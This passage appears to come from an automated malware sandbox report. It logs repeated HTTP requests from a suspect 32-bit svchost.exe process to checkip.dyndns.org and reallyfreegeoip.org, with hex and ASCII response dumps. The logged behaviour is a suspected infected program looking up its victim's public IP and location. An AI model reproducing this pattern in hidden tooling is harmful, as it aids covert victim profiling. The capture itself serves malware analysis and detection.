                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 18, 2024 13:26:00.524892092 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:00 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: 64594630e56c4921e4c676e06060ce6d
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.649759158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:26:01.304986954 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 18, 2024 13:26:02.200850964 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:02 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: d3f7a7eae5807bc83694c968c1c46ad4
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.649771158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:26:02.997497082 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 18, 2024 13:26:03.640324116 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:03 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: a14cc4600495e2f016d9148c651dd242
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.649783158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:26:04.399492025 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 18, 2024 13:26:05.042130947 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:04 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: 0ea779dde636fcb2b0cfa27b175870e9
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.649790158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:26:05.835074902 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 18, 2024 13:26:06.474185944 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:06 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: 1037682f17c2edc0b11bfe147dc8d90c
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.649802158.101.44.242806256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 18, 2024 13:26:07.249432087 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Nov 18, 2024 13:26:07.891217947 CET323INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:07 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 106
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        X-Request-ID: 0147030a310328beb8e9893aa0e29ff8
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649722188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:25:56 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-18 12:25:56 UTC852INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:25:56 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34239
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ged2NEHpPKcXJ1Qlk7f3vgQnRQL%2BIoKJcziY8vpvs2RmnayBwoSR6noHVrfqid5zqnxoOKy4sKZEnfzY%2FwGFYifZMOEdx8HqfGa3sHI0vEg1vTynmY4%2FcHwhNNjH5%2FhoruUsMX7n"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f22e2a646c14-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2627949&cwnd=251&unsent_bytes=0&cid=c991272cf7ea2d76&ts=327&x=0"
                                                                                                        2024-11-18 12:25:56 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.649728188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:25:57 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        2024-11-18 12:25:57 UTC854INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:25:57 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34240
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GxARP6Z9JFD%2FjYMEqnLQ1ATwqyyTESwaflW0LghXBdoHuvr0EvT3itf%2B36LLr8bPH0AxrobvuV3KryGLLwe7qYIOR3j1yCiqfIy0DpUCsvwTn54zZHCnqdme5DRrtS95Rbx6f%2B%2F%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f2347fea6b83-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1858&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1428712&cwnd=243&unsent_bytes=0&cid=f6ff86539ad3c29f&ts=154&x=0"
                                                                                                        2024-11-18 12:25:57 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.649746188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:25:59 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-18 12:25:59 UTC854INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:25:59 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34242
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQoDj4uhSHFSUeT7M%2Fcsd5PueqJf4KALLfgdLs6Nr6QSSuaUIr2rcSTedxEIxx%2FfXFRmnVF%2B%2Flp46%2FCEV65XnKOricRgp5XJpayjU7gCRnl7scjH5ediVMQgKDtbeR1MArmZCmUB"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f2447dc03168-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2244961&cwnd=246&unsent_bytes=0&cid=9ad09d44f9e990e7&ts=148&x=0"
                                                                                                        2024-11-18 12:25:59 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.649753188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:26:01 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-18 12:26:01 UTC856INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:01 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34244
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TTqc2scZs46aH4ulfOpFbxHwqsxp%2FaFgvtn5zznv%2B%2FVT0xnoZ7OTbN4DffS6eEOJFDLOOhSMuNEqAjp58p5heHkOO6JCAGG22wADALpJgNOfmsRjgXAy2%2B5m%2BTbju3UC%2FPPzsqPs"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f24d9ea96c82-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1252&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2225980&cwnd=252&unsent_bytes=0&cid=041c853ebc3bd19c&ts=150&x=0"
                                                                                                        2024-11-18 12:26:01 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.649765188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:26:02 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        2024-11-18 12:26:02 UTC856INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:02 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34245
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2F2XNYJpSK7ZIetganOXOvQY%2BisvDakiY9xlueyHv8zX%2F1z5VvMbGxaPRUq7QNMlUFa%2BOlhfDigJYME03%2FhA89ljfedew1JXG5Lk9A95nqtxFOlsLQNQphFDx%2BWdXjkhogqgU3qn"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f25828124871-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1028&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2724365&cwnd=251&unsent_bytes=0&cid=b378995a046a73f3&ts=170&x=0"
                                                                                                        2024-11-18 12:26:02 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.649777188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:26:04 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-18 12:26:04 UTC852INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:04 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34247
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AaZjjXCjFgqMkuKatBYsF9SnZPB%2BF8qRJLny3VbaghTURLJyypPM3nW%2BXBcN2udv7XH%2BVlO3lfEZaScbHsfxIWKtNrgnNZSjCp%2BVjF4TreBRlqaVZIqJWRQEFNHl5dbNbEji03Wc"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f260fc3eddb2-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1252&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1465587&cwnd=252&unsent_bytes=0&cid=4f1aea3d381cd63a&ts=143&x=0"
                                                                                                        2024-11-18 12:26:04 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.649788188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:26:05 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        2024-11-18 12:26:05 UTC852INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:05 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34248
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QM9HE4mr8nJ%2F4Q1WUr6kcpEIqlC7fXvTHp%2BsjtdNLLzReU5dsqcLVCSjBGfN4%2BMc3wuaxQ36Rb5UsmoczJEpeKwJpAeEmAHYIAN79yvOz0ULhSLqN6J2M%2FUNOUrqgZPTbLQJgcuz"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
